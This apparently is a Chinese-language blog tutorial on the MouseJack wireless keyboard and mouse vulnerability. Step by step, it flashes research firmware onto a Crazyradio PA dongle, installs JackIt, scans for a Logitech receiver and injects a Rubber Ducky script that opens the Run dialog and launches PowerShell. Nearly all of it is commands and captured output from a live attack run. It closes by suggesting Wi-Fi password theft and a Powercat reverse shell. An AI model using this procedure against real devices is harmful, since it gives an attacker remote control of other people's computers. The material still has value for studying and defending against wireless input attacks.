技术笔记

nRF24LU1&收发器攻击Logitech键盘

这是一个4年前关于键盘鼠标的攻击漏洞,由AmazonBasics,戴尔,技嘉,惠普,联想,罗技和微软生产的无线鼠标和键盘都受到许多MouseJack漏洞的影响。具有Crazyradio PA设备(nRF24LU1 +)的攻击者可以将击键注入到大多数这些USB加密狗中,也可以嗅探击键并执行拒绝服务攻击。最终,它使攻击者可以在250英尺外的距离内危害和远程控制计算机。

 

基于Nordic Semiconductor的nRF24LU1 +的Crazyradio PA USB无线加密狗

刷新固件

首先,将需要使用自定义固件刷新新的nRF24LU1 +硬件,以扫描易受攻击的设备并注入按键。首先,确保Kali的APT软件包索引是最新的:

~$ apt-get update

执行Python脚本以构建和自动执行刷新过程需要几个依赖项。使用下面的apt-get命令来确保Git,Python和其他必需的软件包已安装并且是最新的。

~$ apt-get install sdcc binutils python python-pip git

Reading package lists... Done
Building dependency tree
Reading state information... Done
python is already the newest version (2.7.16-1).
python-pip is already the newest version (18.1-5).
The following packages were automatically installed and are no longer required:
  libpython3.6-minimal libpython3.6-stdlib python3.6 python3.6-minimal
Use 'sudo apt autoremove' to remove them.
The following additional packages will be installed:
  binutils-common binutils-x86-64-linux-gnu gputils gputils-common gputils-doc libbinutils sdcc-doc sdcc-libraries
Suggested packages:
  binutils-doc sdcc-ucsim
The following NEW packages will be installed:
  gputils gputils-common gputils-doc sdcc sdcc-doc sdcc-libraries
The following packages will be upgraded:
  binutils binutils-common binutils-x86-64-linux-gnu libbinutils
4 upgraded, 6 newly installed, 0 to remove and 108 not upgraded.
Need to get 9,868 kB of archives.
After this operation, 63.7 MB of additional disk space will be used.
Do you want to continue? [Y/n]

Kali存储库中可用的PIP版本可能有些过时

~$ pip install --upgrade pip

Collecting pip
  Downloading https://files.pythonhosted.org/packages/f9/fb/863012b13912709c13cf5cfdbfb304fa6c727659d6290438e1a88df9d848/pip-19.1-py2.py3-none-any.whl (1.4MB)
    100% |████████████████████████████████| 1.4MB 114kB/s
Installing collected packages: pip
  Found existing installation: pip 18.1
    Not uninstalling pip at /usr/lib/python2.7/dist-packages, outside environment /usr
    Can't uninstall 'pip'. No files were found to uninstall.
Successfully installed pip-19.1

需要通过PIP安装更多的依赖项。在安装PyUSB软件包(Python USB访问模块)时,请使用-I选项。

~$ pip install --upgrade -I pyusb

DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7.
Collecting pyusb
  Downloading https://files.pythonhosted.org/packages/5f/34/2095e821c01225377dda4ebdbd53d8316d6abb243c9bee43d3888fa91dd6/pyusb-1.0.2.tar.gz (54kB)
     |████████████████████████████████| 61kB 82kB/s
Building wheels for collected packages: pyusb
  Building wheel for pyusb (setup.py) ... done
  Stored in directory: /root/.cache/pip/wheels/1f/a9/7e/d189b5030ee3a56f9b72c28281bb11d661b8ea312e28de08a5
Successfully built pyusb
Installing collected packages: pyusb
Successfully installed pyusb-1.0.2

最后,安装最新的PlatformIO软件包,这是一个用于IoT开发的开源生态系统。

~$ pip install --upgrade platformio

Collecting platformio
  Downloading https://files.pythonhosted.org/packages/fe/01/69aa7d8ef8cd74493338396ff86dc1bbfe85ae58b77fc705924c920a38eb/platformio-3.6.7-py27-none-any.whl (161kB)
     |████████████████████████████████| 163kB 92kB/s
Collecting pyserial!=3.3,<4,>=3 (from platformio)
  Downloading https://files.pythonhosted.org/packages/0d/e4/2a744dd9e3be04a0c0907414e2a01a7c88bb3915cbe3c8cc06e209f59c30/pyserial-3.4-py2.py3-none-any.whl (193kB)
     |████████████████████████████████| 194kB 179kB/s
Requirement already satisfied, skipping upgrade: requests<3,>=2.4.0 in /usr/lib/python2.7/dist-packages (from platformio) (2.21.0)
Collecting click<6,>=5 (from platformio)
  Downloading https://files.pythonhosted.org/packages/8f/98/14966b6d772fd5fba1eb3bb34a62a7f736d609572493397cdc5715c14514/click-5.1-py2.py3-none-any.whl (65kB)
     |████████████████████████████████| 71kB 188kB/s
Requirement already satisfied, skipping upgrade: colorama in /usr/lib/python2.7/dist-packages (from platformio) (0.3.7)
Collecting bottle<0.13 (from platformio)
  Downloading https://files.pythonhosted.org/packages/32/4e/ed046324d5ec980c252987c1dca191e001b9f06ceffaebf037eef469937c/bottle-0.12.16.tar.gz (72kB)
     |████████████████████████████████| 81kB 153kB/s
Collecting semantic-version<3,>=2.5.0 (from platformio)
  Downloading https://files.pythonhosted.org/packages/72/83/f76958017f3094b072d8e3a72d25c3ed65f754cc607fdb6a7b33d84ab1d5/semantic_version-2.6.0.tar.gz
Building wheels for collected packages: bottle, semantic-version
  Building wheel for bottle (setup.py) ... done
  Stored in directory: /root/.cache/pip/wheels/0c/68/ac/1546dcb27101ca6c4e50c5b5da92dbd3307f07cda5d88e81c7
  Building wheel for semantic-version (setup.py) ... done
  Stored in directory: /root/.cache/pip/wheels/60/bb/50/215d669d31f992767f5dd8d3c974e79261707ee7f898f0dc10
Successfully built bottle semantic-version
Installing collected packages: pyserial, click, bottle, semantic-version, platformio
  Found existing installation: Click 7.0
    Uninstalling Click-7.0:
      Successfully uninstalled Click-7.0
Successfully installed bottle-0.12.16 click-5.1 platformio-3.6.7 pyserial-3.4 semantic-version-2.6.0

克隆MouseJack存储库

将GitHub上的MouseJack脚本存储库克隆到/ opt目录中。

~$ git clone https://github.com/BastilleResearch/mousejack /opt/mousejack

Cloning into '/opt/mousejack'...
remote: Enumerating objects: 285, done.
remote: Total 285 (delta 0), reused 0 (delta 0), pack-reused 285
Receiving objects: 100% (285/285), 8.63 MiB | 353.00 KiB/s, done.
Resolving deltas: 100% (131/131), done.

更改到新mousejack

~$ cd /opt/mousejack/

使用子模块init选项初始化nrf-research-firmware的本地配置文件。这是固件正在刷新到nRF24LU1 +设备上。

/opt/mousejack$ git submodule init

Submodule 'nrf-research-firmware' (https://github.com/BastilleResearch/nrf-research-firmware.git) registered for path 'nrf-research-firmware'

然后,使用子模块更新选项来获取所有数据并签出列出的适当提交。

/opt/mousejack$ git submodule update

Cloning into '/opt/mousejack/nrf-research-firmware'...
Submodule path 'nrf-research-firmware': checked out '02b84d1c4e59c0fb98263c83b2e7c7f9863a3b93'

转到nrf-research-firmware

/opt/mousejack$ cd nrf-research-firmware/

使用make命令执行Makefile中的命令。

/nrf-research-firmware$ make

mkdir -p bin
sdcc --model-large --std-c99 -c src/main.c -o bin/main.rel
sdcc --model-large --std-c99 -c src/usb.c -o bin/usb.rel
sdcc --model-large --std-c99 -c src/usb_desc.c -o bin/usb_desc.rel
sdcc --model-large --std-c99 -c src/radio.c -o bin/radio.rel
sdcc --xram-loc 0x8000 --xram-size 2048 --model-large bin/main.rel bin/usb.rel bin/usb_desc.rel bin/radio.rel -o bin/dongle.ihx
objcopy -I ihex bin/dongle.ihx -O binary bin/dongle.bin
objcopy --pad-to 26622 --gap-fill 255 -I ihex bin/dongle.ihx -O binary bin/dongle.formatted.bin
objcopy -I binary bin/dongle.formatted.bin -O ihex bin/dongle.formatted.ihx

此时,应将nRF24LU1 +设备插入计算机。然后,执行make install命令。

/nrf-research-firmware$ make install

./prog/usb-flasher/usb-flash.py bin/dongle.bin
[2020-08-15 23:55:44.351]  Looking for a compatible device that can jump to the Nordic bootloader
[2020-08-15 23:55:44.378]  Device found, jumping to the Nordic bootloader
[2020-08-15 23:55:44.969]  Looking for a device running the Nordic bootloader
[2020-08-15 23:55:45.171]  Writing image to flash
[2020-08-15 23:55:45.808]  Verifying write
[2020-08-15 23:55:45.867]  Firmware programming completed successfully
[2020-08-15 23:55:45.867]  Please unplug your dongle or breakout board and plug it back in.

按照说明,从计算机上拔下nRF24LU1 +。要验证固件是否已刷新,请将nRF24LU1 +设备重新插入计算机,然后使用dmesg命令。产品和生产线应分别阅读“研究固件”和“ RFStorm”。

/nrf-research-firmware$ dmesg

[ 2433.986481] usb 2-1: new full-speed USB device number 3 using xhci_hcd
[ 2434.136930] usb 2-1: New USB device found, idVendor=1915, idProduct=0102, bcdDevice= 0.01
[ 2434.136938] usb 2-1: New USB device strings: Mfr=1, Product=2, SerialNumber=0
[ 2434.136942] usb 2-1: Product: Research Firmware
[ 2434.136946] usb 2-1: Manufacturer: RFStorm

克隆JackIt存储库

通过设置nRF24LU1 +设备,现在可以扫描周围区域的无线鼠标和键盘。MouseJack存储库中包含几个很棒的Python脚本,但我们将改用JackIt脚本来自动执行击键注入。

创建者phikshun和骂名,JackIt是一个自动化工具,旨在利用USB橡皮鸭脚本注入到按键易受攻击的设备。

首先下载JackIt存储库。

 

~$ git clone https://github.com/insecurityofthings/jackit.git /opt/jackit

Cloning into '/opt/jackit'...
remote: Enumerating objects: 718, done.
remote: Total 718 (delta 0), reused 0 (delta 0), pack-reused 718
Receiving objects: 100% (718/718), 171.39 KiB | 153.00 KiB/s, done.
Resolving deltas: 100% (439/439), done.

切换到新的jackit,列出目录内容。

~$ cd /opt/jackit/

/opt/jackit$ ls -la

total 48
drwxr-xr-x 6 root root 4096 Apr 26 22:25 .
drwxr-xr-x 6 root root 4096 Apr 26 22:25 ..
drwxr-xr-x 2 root root 4096 Apr 26 22:25 bin
drwxr-xr-x 2 root root 4096 Apr 26 22:25 examples
drwxr-xr-x 8 root root 4096 Apr 26 22:25 .git
-rw-r--r-- 1 root root 1072 Apr 26 22:25 .gitignore
drwxr-xr-x 5 root root 4096 Apr 26 22:25 jackit
-rw-r--r-- 1 root root 4743 Apr 26 22:25 README.md
-rw-r--r-- 1 root root   52 Apr 26 22:25 requirements.txt
-rwxr-xr-x 1 root root  594 Apr 26 22:25 setup.py
-rw-r--r-- 1 root root  289 Apr 26 22:25 tox.ini

我们将找到一个“ requirements.txt”文件。这表明应该使用PIP安装几个依赖项。设置就是这样。

/opt/jackit$ pip install -e .

Obtaining file:///opt/jackit
Requirement already satisfied: click==5.1 in /usr/local/lib/python2.7/dist-packages (from JackIt==0.1.0) (5.1)
Collecting pyusb==1.0.0 (from JackIt==0.1.0)
  Downloading https://files.pythonhosted.org/packages/8a/19/66fb48a4905e472f5dfeda3a1bafac369fbf6d6fc5cf55b780864962652d/PyUSB-1.0.0.tar.gz (52kB)
     |████████████████████████████████| 61kB 81kB/s
Collecting six==1.10.0 (from JackIt==0.1.0)
  Downloading https://files.pythonhosted.org/packages/c8/0a/b6723e1bc4c516cb687841499455a8505b44607ab535be01091c0f24f079/six-1.10.0-py2.py3-none-any.whl
Collecting tabulate==0.7.5 (from JackIt==0.1.0)
  Downloading https://files.pythonhosted.org/packages/db/40/6ffc855c365769c454591ac30a25e9ea0b3e8c952a1259141f5b9878bd3d/tabulate-0.7.5.tar.gz
Building wheels for collected packages: pyusb, tabulate
  Building wheel for pyusb (setup.py) ... done
  Stored in directory: /root/.cache/pip/wheels/a6/69/c7/258e736ee9bdb4553bd9701424b259436b979cf96201af612f
  Building wheel for tabulate (setup.py) ... done
  Stored in directory: /root/.cache/pip/wheels/96/9c/9a/369b6376b11523584a6040a89488c28f0f88cb52167dceb648
Successfully built pyusb tabulate
Installing collected packages: pyusb, six, tabulate, JackIt
  Found existing installation: pyusb 1.0.2
    Uninstalling pyusb-1.0.2:
      Successfully uninstalled pyusb-1.0.2
  Found existing installation: six 1.12.0
    Uninstalling six-1.12.0:
      Successfully uninstalled six-1.12.0
  Running setup.py develop for JackIt
Successfully installed JackIt pyusb-1.0.0 six-1.10.0 tabulate-0.7.5

攻击无线键盘和鼠标

只需在任何终端上键入jackit,即可扫描周围区域的易受攻击的设备。

~$ jackit

     ____.              __   .___  __
    |    |____    ____ |  | _|   |/  |_
    |    \__  \ _/ ___\|  |/ /   \   __\
/\__|    |/ __ \\  \___|    <|   ||  |
\________(____  /\___  >__|_ \___||__|
              \/     \/     \/
JackIt Version 1.00
Created by phikshun, infamy

[!] You must supply a ducky script using --script <filename>
[!] Attacks are disabled.
[+] Starting scan...

[+] Scanning every 5s CTRL-C when ready.

  KEY  ADDRESS         CHANNELS                    COUNT  SEEN         TYPE          PACKET
-----  --------------  ------------------------  -------  -----------  ------------  -----------------------------
    1  C7:D4:21:98:07  74                              3  0:00:07 ago  Logitech HID  00:C2:00:00:03:10:00:00:00:2B

JackIt将连续扫描该区域中的无线鼠标和键盘。易受攻击的设备将在终端中标识其地址(序列号),通道和类型。此信息可用于有针对性的攻击。例如,下面的USB Rubber Ducky有效负载可用于打开运行窗口并将击键注入目标计算机。

GUI r
DELAY 1000
STRING powershell <payload here>
ENTER

要将USB Rubber Ducky脚本与JackIt一起使用,请使用以下命令。

~$ jackit --reset --address C7:D4:21:98:07 --vendor Logitech --script /path/to/ducky/script.txt

Ctrl + c停止扫描。JackIt将询问要注入按键的地址。这是有针对性的攻击,因此扫描中只会出现一个序列号。按1,然后按Enter

[+] Sniffing for C7:D4:21:98:07 every 5s CTRL-C when ready.

  KEY  ADDRESS           CHANNELS    COUNT  SEEN         TYPE          PACKET
-----  --------------  ----------  -------  -----------  ------------  -----------------------------
    1  C7:D4:21:98:07           2        1  0:00:10 ago  Logitech HID  00:C2:00:00:00:00:00:00:00:00
^C

[+] Select target keys (1-1) separated by commas, or 'all':  [all]: 1
[+] Ping success on channel 65
[+] Sending attack to C7:D4:21:98:07 [Logitech HID] on channel 65

[+] All attacks completed

Ducky脚本将打开运行窗口并键入一些任意文本。更复杂的PowerShell攻击可能包括Wi-Fi密码泄露,Windows 10桌面实时流传输以及带有Microsoft服务器上托管的有效负载的Powercat反向外壳。

 

admin
我还没有学会写个人说明!
查看“admin”的所有文章 →

发表评论

电子邮件地址不会被公开。 必填项已用*标注

相关推荐